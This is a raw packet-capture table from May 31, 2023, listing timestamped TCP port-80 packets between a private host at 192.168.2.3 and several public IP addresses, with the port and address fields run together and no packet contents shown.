                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.898329973 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.898339987 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.898375034 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.898421049 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.898432016 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.898478985 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899234056 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899286985 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899332047 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899375916 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899415970 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899422884 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899451017 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.899482965 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900199890 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900233030 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900291920 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900337934 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900367022 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900404930 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.900459051 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.901161909 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.901192904 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.901220083 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.901241064 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.901300907 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.941097021 CEST8049748165.227.252.190192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.941282988 CEST8049748165.227.252.190192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.941373110 CEST4974880192.168.2.3165.227.252.190
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.971884966 CEST4975180192.168.2.323.227.38.74
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.988459110 CEST804975123.227.38.74192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.988681078 CEST4975180192.168.2.323.227.38.74
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039351940 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039410114 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039489985 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039534092 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039582014 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039628029 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039673090 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039732933 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.039803982 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040316105 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040385008 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040410042 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040455103 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040466070 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040498972 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040507078 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040535927 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040549994 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.040596008 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041100025 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041150093 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041165113 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041198015 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041227102 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041244984 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041251898 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041305065 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041313887 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.041368008 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042026043 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042073011 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042117119 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042129040 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042160988 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042170048 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042207003 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042212009 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.042259932 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043023109 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043070078 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043107986 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043112040 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043133020 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043158054 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043169975 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043204069 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043211937 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043260098 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.043976068 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044023991 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044053078 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044070005 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044070959 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044116020 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044121027 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044162989 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044167995 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044214964 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044934034 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044991016 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.044996023 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045052052 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045057058 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045104027 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045108080 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045149088 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045156956 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045200109 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045928001 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.045974970 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046017885 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046030045 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046062946 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046073914 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046107054 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046116114 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046160936 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046927929 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.046974897 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047018051 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047023058 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047023058 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047060966 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047075033 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047105074 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047120094 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047158957 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.047873020 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.048203945 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.073924065 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.074054956 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.084420919 CEST4975180192.168.2.323.227.38.74
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.101042986 CEST804975123.227.38.74192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.188930988 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189017057 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189065933 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189110041 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189158916 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189204931 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189253092 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189263105 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189311981 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189328909 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189388037 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189388037 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189393044 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189440966 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189517975 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.189518929 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190197945 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190244913 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190275908 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190290928 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190299988 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190337896 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190340996 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190387964 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190871000 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190917969 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190953016 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190957069 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.190960884 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191004992 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191016912 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191049099 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191054106 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191098928 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191790104 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191833973 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191860914 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191878080 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191880941 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191922903 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191926003 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191966057 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.191973925 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192013979 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192720890 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192768097 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192795992 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192812920 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192820072 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192861080 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192868948 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192929029 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192940950 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.192984104 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.193617105 CEST8049743104.21.66.46192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.193715096 CEST4974380192.168.2.3104.21.66.46
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.234971046 CEST804975123.227.38.74192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.235109091 CEST4975180192.168.2.323.227.38.74
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.375171900 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.431077957 CEST4975280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574022055 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574062109 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574095011 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574104071 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574129105 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574130058 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.574198008 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.584880114 CEST804970380.93.82.33192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.584995985 CEST4970380192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.613069057 CEST4975380192.168.2.3208.109.214.162
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.614583015 CEST4975480192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.616168976 CEST4975580192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.626852989 CEST4975680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.627907991 CEST8049752122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.628002882 CEST4975280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.628448963 CEST4975280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.629328012 CEST804974613.248.169.48192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.629401922 CEST4974680192.168.2.313.248.169.48
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.650042057 CEST8049754213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.651463032 CEST4975480192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.652190924 CEST4975480192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.720623970 CEST8049754213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.733505964 CEST804975596.127.180.42192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.734210014 CEST4975580192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.734596014 CEST4975580192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770772934 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770817995 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770840883 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770864010 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770885944 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770920992 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770946026 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.770984888 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.771028996 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.771114111 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.791585922 CEST804975669.163.218.51192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.793562889 CEST4975680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.794365883 CEST8049753208.109.214.162192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.797422886 CEST4975380192.168.2.3208.109.214.162
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.822760105 CEST8049752122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.823904037 CEST8049752122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.825212955 CEST8049754213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.825428963 CEST4975280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.825438976 CEST4975480192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.832442999 CEST4975680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.832757950 CEST4975380192.168.2.3208.109.214.162
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.833281994 CEST804970170.39.251.249192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.833368063 CEST4970180192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.851902962 CEST804975596.127.180.42192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.853060007 CEST804975596.127.180.42192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.853169918 CEST4975580192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.902072906 CEST4975480192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.917300940 CEST4975580192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.934437990 CEST8049754213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.935585976 CEST8049754213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.935709953 CEST4975480192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967784882 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967844009 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967890024 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967931032 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967936993 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967931032 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.967979908 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968013048 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968024969 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968060017 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968067884 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968105078 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968120098 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968148947 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968178034 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968190908 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968204975 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968235970 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968308926 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968358040 CEST8049750154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968369007 CEST4975080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.968369007 CEST4975080192.168.2.3154.203.14.100
